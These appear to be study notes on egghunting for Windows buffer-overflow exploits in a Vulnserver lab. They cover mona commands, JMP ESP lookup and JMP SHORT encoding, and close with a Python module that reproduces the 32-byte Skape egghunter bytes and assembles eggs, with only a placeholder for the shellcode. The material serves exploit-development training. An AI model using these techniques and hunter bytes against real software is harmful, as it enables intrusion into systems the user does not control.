
Basic Egghunting #

Source: CaptMeelo [1]

Commands learned #

  • Alternative to pattern_create:
    • /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <buffer_length>
    • becomes, inside Immunity Debugger:
    • !mona pc <buffer_length>
  • Alternative to pattern_offset:
    • /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <buffer_length> -q <value_in_register>
    • becomes
    • !mona findmsp, run in mona itself after the pattern has been sent and the crash has happened
      • Works together with pattern_create (findmsp recognises Metasploit's cyclic pattern in memory and registers) and tells you more than pattern_offset does: which other registers point into the pattern, at what offset, and the size of the whole payload
  • !mona jmp -r esp -m 'essfunc.dll'
    • Lists addresses in essfunc.dll that transfer control to ESP (JMP ESP, CALL ESP, PUSH ESP; RET), to use as the overwritten return address
  • SHORT JUMP
    • \xEB<rel8> (JMP SHORT), where rel8 is a signed byte, so the reach is -128 to +127 bytes
    • rel8 is the two's complement of the displacement: i.e. for 50 bytes back enter '-50' in the calculator site [2], which gives 'FFFFFFFFFFFFFFCE'; keep only the low byte \xCE, so the whole instruction is \xEB\xCE
    • The CPU adds rel8 to the address of the instruction after the jump, so \xEB\xCE lands 48 bytes before the start of the JMP itself, not 50: the 2 bytes of \xEB\xCE are walked back over as well. To land exactly 50 bytes before the JMP, encode -52, i.e. \xEB\xCC
  • !mona egg -t <tag>
    • The tag must be exactly 4 bytes: the generated Skape egghunter loads it with MOV EAX, <tag> and compares it against memory twice with SCASD, so a 7-character tag such as Bellend will not work; i.e. !mona egg -t w00t (mona's default tag)
    • The ~32-byte egghunter goes into the small overflow buffer (after the JMP ESP return address). The shellcode is sent separately, prefixed with the tag twice, via another command that keeps its argument in memory (i.e. "STATS " + "w00tw00t" + shellcode); the hunter scans the process for the doubled tag and jumps to whatever follows it
    • This is how you make space for shellcode: when the buffer you control at the crash is too small for a full payload, only the ~32 bytes of the hunter have to fit, and the shellcode can live anywhere readable in the process
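
Worked example, added here and not part of the original notes or of mona itself: a Python model of the two byte-level details above, the JMP SHORT displacement and the egg/egghunter layout. It assumes the standard 32-byte Skape hunter that `!mona egg` emits (the bytes are reproduced from the well-known hunter, not taken from the page), a 4-byte tag, and an 8-byte INT3 stand-in for the shellcode; the "process memory" it scans is constructed inline.

```python
"""Egghunter payload helpers (added example; not from the original notes or mona)."""
import struct
from typing import Optional

# Skape's 32-byte egghunter, the same bytes `!mona egg` emits.  Offsets (hex) are
# relative to the first byte of the hunter.
HUNTER_HEAD = (
    b"\x66\x81\xca\xff\x0f"  # 00: or dx, 0x0fff  ; edx -> last byte of the current 4K page
    b"\x42"                  # 05: inc edx        ; next page (or next address when looping)
    b"\x52"                  # 06: push edx
    b"\x6a\x02"              # 07: push 0x2
    b"\x58"                  # 09: pop eax        ; syscall 2 = NtAccessCheckAndAuditAlarm
    b"\xcd\x2e"              # 0a: int 0x2e       ; kernel probes [edx] for us, no crash
    b"\x3c\x05"              # 0c: cmp al, 0x05   ; low byte of 0xC0000005 (ACCESS_VIOLATION)?
    b"\x5a"                  # 0e: pop edx
    b"\x74\xef"              # 0f: je 00          ; unreadable -> skip the whole page
)                            # 11: mov eax, <tag> ; b"\xb8" + tag, inserted by egghunter()
HUNTER_TAIL = (
    b"\x8b\xfa"              # 16: mov edi, edx
    b"\xaf"                  # 18: scasd          ; dword [edi] == tag ?  edi += 4
    b"\x75\xea"              # 19: jne 05         ; no -> try the next address
    b"\xaf"                  # 1b: scasd          ; second copy of the tag right behind it?
    b"\x75\xe7"              # 1c: jne 05
    b"\xff\xe7"              # 1e: jmp edi        ; yes -> edi already points past tag+tag
)


def _check_tag(tag: bytes) -> None:
    # MOV EAX, imm32 and SCASD work on one dword: the tag is exactly 4 bytes.
    if len(tag) != 4:
        raise ValueError("egghunter tag must be exactly 4 bytes, e.g. b'w00t'")


def egghunter(tag: bytes = b"w00t") -> bytes:
    """32-byte hunter that searches memory for tag+tag and jumps to what follows."""
    _check_tag(tag)
    hunter = HUNTER_HEAD + b"\xb8" + tag + HUNTER_TAIL
    assert len(hunter) == 32
    return hunter


def build_egg(tag: bytes, shellcode: bytes) -> bytes:
    """The egg: the tag twice, then the shellcode.  Deliver it through any command
    that keeps its argument in memory (in Vulnserver e.g. b'STATS ' + egg)."""
    _check_tag(tag)
    return tag * 2 + shellcode


def hunt(memory: bytes, tag: bytes) -> Optional[int]:
    """Software model of the hunter's byte-by-byte search: offset just past the first
    tag+tag in `memory` (where `jmp edi` would land), or None if there is no egg."""
    marker = tag * 2
    pos = memory.find(marker)
    return None if pos < 0 else pos + len(marker)


def short_jmp(distance: int) -> bytes:
    """EB rel8.  `distance` is measured from the first byte of the JMP itself; the CPU
    adds rel8 to the address of the *next* instruction, so the JMP's own 2 bytes
    have to be subtracted out."""
    rel8 = distance - 2
    if not -128 <= rel8 <= 127:
        raise ValueError("out of range for JMP SHORT; use E9 rel32 instead")
    return b"\xeb" + struct.pack("<b", rel8)


def short_jmp_target(jmp_addr: int, encoding: bytes) -> int:
    """Where an EB rel8 located at jmp_addr actually lands."""
    rel8 = struct.unpack("<b", encoding[1:2])[0]
    return jmp_addr + len(encoding) + rel8


def demo() -> dict:
    tag = b"w00t"
    shellcode = b"\xcc" * 8  # constructed stand-in (INT3s), not real shellcode
    egg = build_egg(tag, shellcode)
    # Constructed process image: the hunter sits in the small overflow buffer, the egg
    # was stored elsewhere (e.g. by a STATS command), junk in between and around.
    memory = b"A" * 100 + egghunter(tag) + b"B" * 200 + egg + b"C" * 50
    landing = hunt(memory, tag)
    return {
        "hunter_len": len(egghunter(tag)),
        "landing": landing,
        "lands_on_shellcode": memory[landing:landing + len(shellcode)] == shellcode,
        # the hunter holds the tag only once, so it never "finds" itself
        "hunter_skips_itself": tag * 2 not in egghunter(tag),
        "jmp_back_48": short_jmp(-48),  # the page's \xEB\xCE
        "jmp_back_50": short_jmp(-50),  # \xEB\xCC
        "eb_ce_lands_at": short_jmp_target(0x1000, b"\xeb\xce") - 0x1000,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:20} {v!r}")
```

`hunt` is only a model of the search; on the target the hunter itself does the scanning, one byte at a time, with the `int 0x2e` probe keeping it from faulting on unmapped pages. The rel8 arithmetic is the part people get wrong: `short_jmp(-48)` yields the page's `\xEB\xCE`, and `short_jmp(-50)` yields `\xEB\xCC`.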

Last update: January 22, 2021